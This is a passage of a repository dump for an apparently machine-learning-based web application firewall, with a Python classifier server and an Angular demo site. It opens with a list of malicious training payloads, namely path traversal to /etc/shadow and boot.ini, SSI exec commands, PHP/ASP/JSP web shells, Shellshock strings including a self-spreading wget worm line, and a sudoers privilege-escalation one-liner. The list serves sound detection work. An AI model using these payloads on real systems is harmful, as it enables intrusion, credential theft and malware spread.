288 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
289 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
290 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
291 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00
292 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini
293 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
294 | \\&apos;/bin/cat%20/etc/passwd\\&apos;
295 | \\&apos;/bin/cat%20/etc/shadow\\&apos;
296 | ../../../../../../../../conf/server.xml
297 | /../../../../../../../../bin/id|
298 | ../../../../../../../../../../../../localstart.asp%00
299 | ../../../../../../../../../../../../localstart.asp
300 | ../../../../../../../../../../../../boot.ini%00
301 | ../../../../../../../../../../../../boot.ini
302 | /./././././././././././boot.ini
303 | /../../../../../../../../../../../boot.ini%00
304 | /../../../../../../../../../../../boot.ini
305 | /..\../..\../..\../..\../..\../..\../boot.ini
306 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
307 | \..\..\..\..\..\..\..\..\..\..\boot.ini
308 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00
309 | ..\..\..\..\..\..\..\..\..\..\boot.ini
310 | /../../../../../../../../../../../boot.ini%00.html
311 | /../../../../../../../../../../../boot.ini%00.jpg
312 | /.../.../.../.../.../
313 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
314 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
315 | <!--#exec cmd="/bin/ls /" --><br/>
316 | <!--#exec cmd="cat /etc/passwd" --><br/>
317 | <!--#exec cmd="find / -name . -print" --><br/>
318 | <!--#exec cmd="mail Florian Roth @4nc4p <mailto:Florian Roth @4nc4p> < cat /etc/passwd" --><br/>
319 | <% eval request("cmd") %> 
320 | <?php system($_GET["cmd"]) ?> 
321 | <% Runtime.getruntime().exec(request.getParameter("cmd")) %>
322 | () {<svg onload="alert(1)"> {')' "(</svg>" {& }; echo -e "header\x3axss
323 | env x='() { :;}; apt-get update && apt-get install --only-upgrade bash' bash -c "Oops."
324 | s='() { .;};wget x.x.x.x/WORM;chmod +x WORM;./WORM';while true;do wget $[RANDOM%255].$[RANDOM%255].$[RANDOM%255].$[RANDOM%255] -U'$s';done
325 | env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
326 | foo='() { echo "hi mom"; }' bash -c 'foo'
327 | Cookie: () { echo "Hello world"; }
328 | () { :;}; /bin/bash -c \"wget http://a.b.c.d/bash-count.txt\"
329 | echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo su
330 | strings /usr/lib/dyld | grep ^DYLD_ | sed -e 's/^/note to self: try exploiting /'
331 | 


--------------------------------------------------------------------------------
/data/tfidf_2grams_randomforest.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/tfidf_2grams_randomforest.p


--------------------------------------------------------------------------------
/data/trained_classifier_custom_4_features.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/trained_classifier_custom_4_features.p


--------------------------------------------------------------------------------
/data/trained_classifier_custom_5_features.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/trained_classifier_custom_5_features.p


--------------------------------------------------------------------------------
/data/trained_classifier_custom_6_features.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/trained_classifier_custom_6_features.p


--------------------------------------------------------------------------------
/data/trained_classifier_custom_7_features.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/trained_classifier_custom_7_features.p


--------------------------------------------------------------------------------
/data/trained_classifier_custom_8_features.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/trained_classifier_custom_8_features.p


--------------------------------------------------------------------------------
/data/trained_classifier_custom_9_features.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/trained_classifier_custom_9_features.p


--------------------------------------------------------------------------------
/data/trained_classifier_custom_all_features.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/trained_classifier_custom_all_features.p


--------------------------------------------------------------------------------
/data/trained_classifiers.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/trained_classifiers.p


--------------------------------------------------------------------------------
/data/trained_classifiers_custom.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/data/trained_classifiers_custom.p


--------------------------------------------------------------------------------
/demo-server/.angular-cli.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "$schema": "./node_modules/@angular/cli/lib/config/schema.json",
 3 |   "project": {
 4 |     "name": "server"
 5 |   },
 6 |   "apps": [
 7 |     {
 8 |       "root": "src",
 9 |       "outDir": "dist",
10 |       "assets": [
11 |         "assets",
12 |         "favicon.ico"
13 |       ],
14 |       "index": "index.html",
15 |       "main": "main.ts",
16 |       "polyfills": "polyfills.ts",
17 |       "test": "test.ts",
18 |       "tsconfig": "tsconfig.app.json",
19 |       "testTsconfig": "tsconfig.spec.json",
20 |       "prefix": "app",
21 |       "styles": [
22 |         "styles.css"
23 |       ],
24 |       "scripts": [],
25 |       "environmentSource": "environments/environment.ts",
26 |       "environments": {
27 |         "dev": "environments/environment.ts",
28 |         "prod": "environments/environment.prod.ts"
29 |       }
30 |     }
31 |   ],
32 |   "e2e": {
33 |     "protractor": {
34 |       "config": "./protractor.conf.js"
35 |     }
36 |   },
37 |   "lint": [
38 |     {
39 |       "project": "src/tsconfig.app.json"
40 |     },
41 |     {
42 |       "project": "src/tsconfig.spec.json"
43 |     },
44 |     {
45 |       "project": "e2e/tsconfig.e2e.json"
46 |     }
47 |   ],
48 |   "test": {
49 |     "karma": {
50 |       "config": "./karma.conf.js"
51 |     }
52 |   },
53 |   "defaults": {
54 |     "styleExt": "css",
55 |     "component": {}
56 |   }
57 | }
58 | 


--------------------------------------------------------------------------------
/demo-server/.editorconfig:
--------------------------------------------------------------------------------
 1 | # Editor configuration, see http://editorconfig.org
 2 | root = true
 3 | 
 4 | [*]
 5 | charset = utf-8
 6 | indent_style = space
 7 | indent_size = 2
 8 | insert_final_newline = true
 9 | trim_trailing_whitespace = true
10 | 
11 | [*.md]
12 | max_line_length = off
13 | trim_trailing_whitespace = false
14 | 


--------------------------------------------------------------------------------
/demo-server/.gitignore:
--------------------------------------------------------------------------------
 1 | # See http://help.github.com/ignore-files/ for more about ignoring files.
 2 | 
 3 | # compiled output
 4 | /dist
 5 | /tmp
 6 | /out-tsc
 7 | 
 8 | # dependencies
 9 | /node_modules
10 | 
11 | # IDEs and editors
12 | /.idea
13 | .project
14 | .classpath
15 | .c9/
16 | *.launch
17 | .settings/
18 | *.sublime-workspace
19 | 
20 | # IDE - VSCode
21 | .vscode/*
22 | !.vscode/settings.json
23 | !.vscode/tasks.json
24 | !.vscode/launch.json
25 | !.vscode/extensions.json
26 | 
27 | # misc
28 | /.sass-cache
29 | /connect.lock
30 | /coverage
31 | /libpeerconnection.log
32 | npm-debug.log
33 | testem.log
34 | /typings
35 | 
36 | # e2e
37 | /e2e/*.js
38 | /e2e/*.map
39 | 
40 | # System Files
41 | .DS_Store
42 | Thumbs.db
43 | 


--------------------------------------------------------------------------------
/demo-server/README.md:
--------------------------------------------------------------------------------
 1 | # Server
 2 | 
 3 | Demonstration website for the classifier
 4 | 
 5 | # Installation guide
 6 | 
 7 | 1 Install Python and node.js
 8 | 
 9 | 2 Start the python server: "python pyserver.py" in terminal
10 | 
11 | 3 Install the node modules: "npm install" in terminal
12 | 
13 | 4 Start the node server: "npm run build" in terminal
14 | 
15 | 5 go to [demo-website](http://localhost:3000)


--------------------------------------------------------------------------------
/demo-server/e2e/app.e2e-spec.ts:
--------------------------------------------------------------------------------
 1 | import { ServerPage } from './app.po';
 2 | 
 3 | describe('server App', () => {
 4 |   let page: ServerPage;
 5 | 
 6 |   beforeEach(() => {
 7 |     page = new ServerPage();
 8 |   });
 9 | 
10 |   it('should display message saying app works', () => {
11 |     page.navigateTo();
12 |     expect(page.getParagraphText()).toEqual('app works!');
13 |   });
14 | });
15 | 


--------------------------------------------------------------------------------
/demo-server/e2e/app.po.ts:
--------------------------------------------------------------------------------
 1 | import { browser, element, by } from 'protractor';
 2 | 
 3 | export class ServerPage {
 4 |   navigateTo() {
 5 |     return browser.get('/');
 6 |   }
 7 | 
 8 |   getParagraphText() {
 9 |     return element(by.css('app-root h1')).getText();
10 |   }
11 | }
12 | 


--------------------------------------------------------------------------------
/demo-server/e2e/tsconfig.e2e.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "extends": "../tsconfig.json",
 3 |   "compilerOptions": {
 4 |     "outDir": "../out-tsc/e2e",
 5 |     "module": "commonjs",
 6 |     "target": "es5",
 7 |     "types":[
 8 |       "jasmine",
 9 |       "node"
10 |     ]
11 |   }
12 | }
13 | 


--------------------------------------------------------------------------------
/demo-server/karma.conf.js:
--------------------------------------------------------------------------------
 1 | // Karma configuration file, see link for more information
 2 | // https://karma-runner.github.io/0.13/config/configuration-file.html
 3 | 
 4 | module.exports = function (config) {
 5 |   config.set({
 6 |     basePath: '',
 7 |     frameworks: ['jasmine', '@angular/cli'],
 8 |     plugins: [
 9 |       require('karma-jasmine'),
10 |       require('karma-chrome-launcher'),
11 |       require('karma-jasmine-html-reporter'),
12 |       require('karma-coverage-istanbul-reporter'),
13 |       require('@angular/cli/plugins/karma')
14 |     ],
15 |     client:{
16 |       clearContext: false // leave Jasmine Spec Runner output visible in browser
17 |     },
18 |     files: [
19 |       { pattern: './src/test.ts', watched: false }
20 |     ],
21 |     preprocessors: {
22 |       './src/test.ts': ['@angular/cli']
23 |     },
24 |     mime: {
25 |       'text/x-typescript': ['ts','tsx']
26 |     },
27 |     coverageIstanbulReporter: {
28 |       reports: [ 'html', 'lcovonly' ],
29 |       fixWebpackSourcePaths: true
30 |     },
31 |     angularCli: {
32 |       environment: 'dev'
33 |     },
34 |     reporters: config.angularCli && config.angularCli.codeCoverage
35 |               ? ['progress', 'coverage-istanbul']
36 |               : ['progress', 'kjhtml'],
37 |     port: 9876,
38 |     colors: true,
39 |     logLevel: config.LOG_INFO,
40 |     autoWatch: true,
41 |     browsers: ['Chrome'],
42 |     singleRun: false
43 |   });
44 | };
45 | 


--------------------------------------------------------------------------------
/demo-server/npm-debug.log.179372140:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/demo-server/npm-debug.log.179372140


--------------------------------------------------------------------------------
/demo-server/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "server",
 3 |   "version": "0.0.0",
 4 |   "license": "MIT",
 5 |   "scripts": {
 6 |     "ng": "ng",
 7 |     "start": "ng serve",
 8 |     "build": "ng build && node server.js",
 9 |     "test": "ng test",
10 |     "lint": "ng lint",
11 |     "e2e": "ng e2e"
12 |   },
13 |   "private": true,
14 |   "dependencies": {
15 |     "@angular/animations": "^4.1.2",
16 |     "@angular/common": "^4.0.0",
17 |     "@angular/compiler": "^4.0.0",
18 |     "@angular/core": "^4.0.0",
19 |     "@angular/flex-layout": "^2.0.0-beta.8",
20 |     "@angular/forms": "^4.0.0",
21 |     "@angular/http": "^4.0.0",
22 |     "@angular/material": "^2.0.0-beta.5",
23 |     "@angular/platform-browser": "^4.0.0",
24 |     "@angular/platform-browser-dynamic": "^4.0.0",
25 |     "@angular/router": "^4.0.0",
26 |     "body-parser": "^1.17.1",
27 |     "core-js": "^2.4.1",
28 |     "express": "^4.15.2",
29 |     "requestify": "^0.2.5",
30 |     "rxjs": "^5.1.0",
31 |     "zone.js": "^0.8.4"
32 |   },
33 |   "devDependencies": {
34 |     "@angular/cli": "1.0.2",
35 |     "@angular/compiler-cli": "^4.0.0",
36 |     "@types/jasmine": "2.5.38",
37 |     "@types/node": "~6.0.60",
38 |     "codelyzer": "~2.0.0",
39 |     "jasmine-core": "~2.5.2",
40 |     "jasmine-spec-reporter": "~3.2.0",
41 |     "karma": "~1.4.1",
42 |     "karma-chrome-launcher": "~2.0.0",
43 |     "karma-cli": "~1.0.1",
44 |     "karma-jasmine": "~1.1.0",
45 |     "karma-jasmine-html-reporter": "^0.2.2",
46 |     "karma-coverage-istanbul-reporter": "^0.2.0",
47 |     "protractor": "~5.1.0",
48 |     "ts-node": "~2.0.0",
49 |     "tslint": "~4.5.0",
50 |     "typescript": "~2.2.0"
51 |   }
52 | }
53 | 


--------------------------------------------------------------------------------
/demo-server/protractor.conf.js:
--------------------------------------------------------------------------------
 1 | // Protractor configuration file, see link for more information
 2 | // https://github.com/angular/protractor/blob/master/lib/config.ts
 3 | 
 4 | const { SpecReporter } = require('jasmine-spec-reporter');
 5 | 
 6 | exports.config = {
 7 |   allScriptsTimeout: 11000,
 8 |   specs: [
 9 |     './e2e/**/*.e2e-spec.ts'
10 |   ],
11 |   capabilities: {
12 |     'browserName': 'chrome'
13 |   },
14 |   directConnect: true,
15 |   baseUrl: 'http://localhost:4200/',
16 |   framework: 'jasmine',
17 |   jasmineNodeOpts: {
18 |     showColors: true,
19 |     defaultTimeoutInterval: 30000,
20 |     print: function() {}
21 |   },
22 |   beforeLaunch: function() {
23 |     require('ts-node').register({
24 |       project: 'e2e/tsconfig.e2e.json'
25 |     });
26 |   },
27 |   onPrepare() {
28 |     jasmine.getEnv().addReporter(new SpecReporter({ spec: { displayStacktrace: true } }));
29 |   }
30 | };
31 | 


--------------------------------------------------------------------------------
/demo-server/pyserver.py:
--------------------------------------------------------------------------------
 1 | from http.server import BaseHTTPRequestHandler,HTTPServer
 2 | import pickle
 3 | from sklearn.feature_extraction.text import TfidfVectorizer
 4 | from sklearn.ensemble import RandomForestClassifier
 5 | import sys
 6 | 
 7 | PORT_NUMBER = 3001
 8 | 
 9 | def get2Grams(payload_obj):
10 |     '''Divides a string into 2-grams
11 |     
12 |     Example: input - payload: "<script>"
13 |              output- ["<s","sc","cr","ri","ip","pt","t>"]
14 |     '''
15 |     payload = str(payload_obj)
16 |     ngrams = []
17 |     for i in range(0,len(payload)-2):
18 |         ngrams.append(payload[i:i+2])
19 |     return ngrams
20 | 
21 | 
22 | 
23 | def injection_test(inputs):
24 |     return 'MALICIOUS' if classifier.predict([inputs]).sum() > 0 else 'NOT_MALICIOUS'
25 | 
26 | 
27 | #This class will handles any incoming request from
28 | #the browser 
29 | class myHandler(BaseHTTPRequestHandler):
30 | 	
31 | 	#Handler for the GET requests
32 | 	def do_GET(self):
33 | 		print(self.path)
34 | 		self.send_response(200)
35 | 		self.send_header('Content-type','text/html')
36 | 		self.end_headers()
37 | 
38 | 		
39 | 		# Send the html message
40 | 		self.wfile.write(bytes(injection_test(self.path[1:]), "utf8"))
41 | 		return 
42 | 
43 | try:
44 | 	classifier = pickle.load( open("tfidf_2grams_randomforest.p", "rb"))
45 | 	#Create a web server and define the handler to manage the
46 | 	#incoming request
47 | 	server = HTTPServer(('', PORT_NUMBER), myHandler)
48 | 	print ('Started httpserver on port ')	
49 | 	
50 | 	#Wait forever for incoming htto requests
51 | 	server.serve_forever()
52 | 
53 | except KeyboardInterrupt:
54 | 	print ('^C received, shutting down the web server')
55 | 	server.socket.close()
56 | 
57 | 
58 | 
59 | 
60 | 


--------------------------------------------------------------------------------
/demo-server/server.js:
--------------------------------------------------------------------------------
 1 | // Get dependencies
 2 | const express = require('express');
 3 | const path = require('path');
 4 | const http = require('http');
 5 | const bodyParser = require('body-parser');
 6 | 
 7 | // Get our API routes
 8 | const api = require('./server/routes/api');
 9 | 
10 | const app = express();
11 | 
12 | // Parsers for POST data
13 | app.use(bodyParser.json());
14 | app.use(bodyParser.urlencoded({ extended: false }));
15 | 
16 | // Point static path to dist
17 | app.use(express.static(path.join(__dirname, 'dist')));
18 | 
19 | // Set our api routes
20 | app.use('/api', api);
21 | 
22 | // Catch all other routes and return the index file
23 | app.get('*', (req, res) => {
24 |   res.sendFile(path.join(__dirname, 'dist/index.html'));
25 | });
26 | 
27 | /**
28 |  * Get port from environment and store in Express.
29 |  */
30 | const port = process.env.PORT || '3000';
31 | app.set('port', port);
32 | 
33 | /**
34 |  * Create HTTP server.
35 |  */
36 | const server = http.createServer(app);
37 | 
38 | /**
39 |  * Listen on provided port, on all network interfaces.
40 |  */
41 | server.listen(port, () => console.log(`API running on localhost:${port}`));


--------------------------------------------------------------------------------
/demo-server/server/routes/api.js:
--------------------------------------------------------------------------------
 1 | const express = require('express');
 2 | const router = express.Router();
 3 | var requestify = require('requestify');
 4 | 
 5 | router.get('/classify/:input', (req, res) =>{
 6 |   requestify.get('http://localhost:3001/' + req.params.input).then(function(response) {
 7 | 		res.send(response.getBody());
 8 | 	})
 9 | })
10 | 
11 | /* GET api listing. */
12 | router.get('/', (req, res) => {
13 |   res.send('api works');
14 | });
15 | 
16 | 
17 | 
18 | module.exports = router;


--------------------------------------------------------------------------------
/demo-server/src/app/app.component.css:
--------------------------------------------------------------------------------
1 | .wrapper{
2 |     margin: 0 auto;
3 | }


--------------------------------------------------------------------------------
/demo-server/src/app/app.component.html:
--------------------------------------------------------------------------------
1 | <div class="wrapper">
2 |   <h1>
3 |     {{title}}
4 |   </h1>
5 |   <router-outlet></router-outlet>
6 | </div>
7 | 


--------------------------------------------------------------------------------
/demo-server/src/app/app.component.spec.ts:
--------------------------------------------------------------------------------
 1 | import { TestBed, async } from '@angular/core/testing';
 2 | 
 3 | import { AppComponent } from './app.component';
 4 | 
 5 | describe('AppComponent', () => {
 6 |   beforeEach(async(() => {
 7 |     TestBed.configureTestingModule({
 8 |       declarations: [
 9 |         AppComponent
10 |       ],
11 |     }).compileComponents();
12 |   }));
13 | 
14 |   it('should create the app', async(() => {
15 |     const fixture = TestBed.createComponent(AppComponent);
16 |     const app = fixture.debugElement.componentInstance;
17 |     expect(app).toBeTruthy();
18 |   }));
19 | 
20 |   it(`should have as title 'app works!'`, async(() => {
21 |     const fixture = TestBed.createComponent(AppComponent);
22 |     const app = fixture.debugElement.componentInstance;
23 |     expect(app.title).toEqual('app works!');
24 |   }));
25 | 
26 |   it('should render title in a h1 tag', async(() => {
27 |     const fixture = TestBed.createComponent(AppComponent);
28 |     fixture.detectChanges();
29 |     const compiled = fixture.debugElement.nativeElement;
30 |     expect(compiled.querySelector('h1').textContent).toContain('app works!');
31 |   }));
32 | });
33 | 


--------------------------------------------------------------------------------
/demo-server/src/app/app.component.ts:
--------------------------------------------------------------------------------
 1 | import { Component } from '@angular/core';
 2 | 
 3 | @Component({
 4 |   selector: 'app-root',
 5 |   templateUrl: './app.component.html',
 6 |   styleUrls: ['./app.component.css']
 7 | })
 8 | export class AppComponent {
 9 |   title = '';
10 | }
11 | 


--------------------------------------------------------------------------------
/demo-server/src/app/app.module.ts:
--------------------------------------------------------------------------------
 1 | import { BrowserModule } from '@angular/platform-browser';
 2 | import { NgModule } from '@angular/core';
 3 | import { FormsModule } from '@angular/forms';
 4 | import { HttpModule } from '@angular/http';
 5 | import { RouterModule} from '@angular/router';
 6 | import { AppComponent } from './app.component';
 7 | import { ClassifierComponent } from './classifier/classifier.component';
 8 | import { FlexLayoutModule} from '@angular/flex-layout';
 9 | import { ClassifierService } from './classifier.service';
10 | import {
11 | MdButtonModule,
12 | MdCheckboxModule,
13 | MdTabsModule,
14 | MdTooltipModule,
15 | MdAutocompleteModule,
16 | MdInputModule,
17 | MdSelectModule,
18 | MdSliderModule,
19 | MdMenuModule,
20 | MdSidenavModule,
21 | MdProgressBarModule,
22 | MdDialogModule,
23 | MdSnackBarModule
24 | } from '@angular/material';
25 | 
26 | export const MATERIAL_IMPORTS = [
27 | MdButtonModule,
28 | MdCheckboxModule,
29 | MdTabsModule,
30 | MdTooltipModule,
31 | MdAutocompleteModule,
32 | MdInputModule,
33 | MdSelectModule,
34 | MdSliderModule,
35 | MdMenuModule,
36 | MdSidenavModule,
37 | MdProgressBarModule,
38 | MdDialogModule,
39 | MdSnackBarModule
40 | ];
41 | 
42 | 
43 | 
44 | // Define the routes
45 | 
46 | const ROUTES = [
47 |   {
48 |     path: '',
49 |     component: ClassifierComponent
50 |   },
51 |   {
52 |     path: 'classifier',
53 |     component: ClassifierComponent
54 |   }
55 | ];
56 | 
57 | @NgModule({
58 |   declarations: [
59 |     AppComponent,
60 |     ClassifierComponent
61 |   ],
62 |   imports: [
63 |     BrowserModule,
64 |     FormsModule,
65 |     HttpModule,
66 |     RouterModule.forRoot(ROUTES),
67 |     FlexLayoutModule,
68 |     MATERIAL_IMPORTS
69 |   ],
70 |   providers: [ClassifierService],
71 |   bootstrap: [AppComponent]
72 | })
73 | export class AppModule { }
74 | 


--------------------------------------------------------------------------------
/demo-server/src/app/classifier.service.spec.ts:
--------------------------------------------------------------------------------
 1 | import { TestBed, inject } from '@angular/core/testing';
 2 | 
 3 | import { ClassifierService } from './classifier.service';
 4 | 
 5 | describe('ClassifierService', () => {
 6 |   beforeEach(() => {
 7 |     TestBed.configureTestingModule({
 8 |       providers: [ClassifierService]
 9 |     });
10 |   });
11 | 
12 |   it('should ...', inject([ClassifierService], (service: ClassifierService) => {
13 |     expect(service).toBeTruthy();
14 |   }));
15 | });
16 | 


--------------------------------------------------------------------------------
/demo-server/src/app/classifier.service.ts:
--------------------------------------------------------------------------------
 1 | import { Injectable } from '@angular/core';
 2 | import { Http } from '@angular/http';
 3 | import 'rxjs/add/operator/map';
 4 | 
 5 | @Injectable()
 6 | export class ClassifierService {
 7 | 
 8 |   constructor(private http: Http) { }
 9 | 
10 |   classifyInput(input) {
11 |     return this.http.get('/api/classify/' + input);
12 | 
13 |   }
14 | 
15 | }
16 | 


--------------------------------------------------------------------------------
/demo-server/src/app/classifier/classifier.component.css:
--------------------------------------------------------------------------------
 1 | .main{
 2 |     margin: 0 auto;
 3 | }
 4 | 
 5 | .header{
 6 |     text-align: center;
 7 |     width: 100%;
 8 |     float: left;
 9 | }
10 | 
11 | .body{
12 |     width: 100%;
13 |     float: left;
14 |         
15 | }
16 | 
17 | .input{
18 |     margin: 0 auto;
19 | }
20 | 
21 | .classified{
22 |     width: 100%;
23 | }
24 | 
25 | .legal{
26 |     width: 49%;
27 |     display: inline-block;
28 | }
29 | 
30 | .malicious{
31 |     width: 49%;
32 |     display: inline-block;
33 | }
34 | 
35 | .class-title{
36 |     width: 100%;
37 |     text-align: center;
38 |     display: inline-block;
39 |     font-size: 40px;
40 | }
41 | 
42 | .list{
43 |     display: inline-block;
44 | }
45 | 
46 | .input-string{
47 |     margin-right: 10px;
48 |     width: 250px;
49 | }


--------------------------------------------------------------------------------
/demo-server/src/app/classifier/classifier.component.html:
--------------------------------------------------------------------------------
 1 | <div class="main">
 2 |   <div class="header">
 3 |     <h1>Machine Learning based Web Application Firewall</h1>
 4 |   </div>
 5 |   <div class="body">
 6 |     <div class="input" fxLayout="row" fxLayoutAlign="center center">
 7 |       <md-input-container class="input-string">
 8 |         <input mdInput placeholder="Input string" [(ngModel)]="input" (keypress)=onKey($event)>
 9 |       </md-input-container>
10 |       <button md-button (click)="submit()">Submit</button>
11 |     </div>
12 | 
13 |     <div class="classified">
14 |       <div class="legal">
15 |         <div class="class-title"><b>Legal</b></div>
16 |         <div fxLayoutAlign="center center">
17 |           <ul class="list">
18 |             <li *ngFor="let input of legal">
19 |               {{input}}
20 |             </li>
21 |           </ul>
22 |         </div>
23 |       </div>
24 |       <div class="malicious">
25 |         <div class="class-title"><b>Malicious</b></div>
26 |         <div fxLayoutAlign="center center">
27 |           <ul class="list">
28 |             <li *ngFor="let input of malicious">
29 |               {{input}}
30 |             </li>
31 |           </ul>
32 |         </div>
33 |       </div>
34 |     </div>
35 |   </div>
36 | </div>
37 | 
38 | 


--------------------------------------------------------------------------------
/demo-server/src/app/classifier/classifier.component.spec.ts:
--------------------------------------------------------------------------------
 1 | import { async, ComponentFixture, TestBed } from '@angular/core/testing';
 2 | 
 3 | import { ClassifierComponent } from './classifier.component';
 4 | 
 5 | describe('ClassifierComponent', () => {
 6 |   let component: ClassifierComponent;
 7 |   let fixture: ComponentFixture<ClassifierComponent>;
 8 | 
 9 |   beforeEach(async(() => {
10 |     TestBed.configureTestingModule({
11 |       declarations: [ ClassifierComponent ]
12 |     })
13 |     .compileComponents();
14 |   }));
15 | 
16 |   beforeEach(() => {
17 |     fixture = TestBed.createComponent(ClassifierComponent);
18 |     component = fixture.componentInstance;
19 |     fixture.detectChanges();
20 |   });
21 | 
22 |   it('should create', () => {
23 |     expect(component).toBeTruthy();
24 |   });
25 | });
26 | 


--------------------------------------------------------------------------------
/demo-server/src/app/classifier/classifier.component.ts:
--------------------------------------------------------------------------------
 1 | import { Component, OnInit } from '@angular/core';
 2 | import { BrowserModule } from '@angular/platform-browser';
 3 | import { ClassifierService } from '../classifier.service';
 4 | import { Http, RequestOptions, Request, RequestMethod } from '@angular/http';
 5 | import { Router, RouterModule } from '@angular/router';
 6 | import 'rxjs/add/operator/catch';
 7 | import 'rxjs/add/operator/map';
 8 | 
 9 | 
10 | @Component({
11 |   selector: 'app-classifier',
12 |   templateUrl: './classifier.component.html',
13 |   styleUrls: ['./classifier.component.css']
14 | })
15 | export class ClassifierComponent implements OnInit {
16 | 
17 |   input = ""
18 | 
19 |   public malicious = []
20 |   public legal = []
21 | 
22 |   constructor(private http: Http, private classifierService : ClassifierService) { }
23 | 
24 |   
25 |   ngOnInit() {
26 | 
27 | 
28 |   }
29 | 
30 |   submit(){
31 |     this.classifierService.classifyInput(this.input)
32 |     .subscribe(result =>{
33 |       var classifiedAs = result.text();
34 | 
35 |       if(classifiedAs == 'NOT_MALICIOUS'){
36 |         this.legal.push(this.input);
37 |       } else{
38 |         this.malicious.push(this.input);
39 |       }
40 |       this.input = ''
41 |     })
42 |   }
43 | 
44 |   onKey(event){
45 |     if(event.keyCode == 13){
46 |       this.submit();
47 |     }
48 |   }
49 | 
50 |   
51 | 
52 | 
53 | }
54 | 


--------------------------------------------------------------------------------
/demo-server/src/assets/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/demo-server/src/assets/.gitkeep


--------------------------------------------------------------------------------
/demo-server/src/environments/environment.prod.ts:
--------------------------------------------------------------------------------
1 | export const environment = {
2 |   production: true
3 | };
4 | 


--------------------------------------------------------------------------------
/demo-server/src/environments/environment.ts:
--------------------------------------------------------------------------------
1 | // The file contents for the current environment will overwrite these during build.
2 | // The build system defaults to the dev environment which uses `environment.ts`, but if you do
3 | // `ng build --env=prod` then `environment.prod.ts` will be used instead.
4 | // The list of which env maps to which file can be found in `.angular-cli.json`.
5 | 
6 | export const environment = {
7 |   production: false
8 | };
9 | 


--------------------------------------------------------------------------------
/demo-server/src/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/demo-server/src/favicon.ico


--------------------------------------------------------------------------------
/demo-server/src/index.html:
--------------------------------------------------------------------------------
 1 | <!doctype html>
 2 | <html>
 3 | <head>
 4 |   <meta charset="utf-8">
 5 |   <title>Server</title>
 6 |   <base href="/">
 7 | 
 8 |   <meta name="viewport" content="width=device-width, initial-scale=1">
 9 |   <link rel="icon" type="image/x-icon" href="favicon.ico">
10 | </head>
11 | <body>
12 |   <app-root>Loading...</app-root>
13 | </body>
14 | </html>
15 | 


--------------------------------------------------------------------------------
/demo-server/src/main.ts:
--------------------------------------------------------------------------------
 1 | import { enableProdMode } from '@angular/core';
 2 | import { platformBrowserDynamic } from '@angular/platform-browser-dynamic';
 3 | 
 4 | import { AppModule } from './app/app.module';
 5 | import { environment } from './environments/environment';
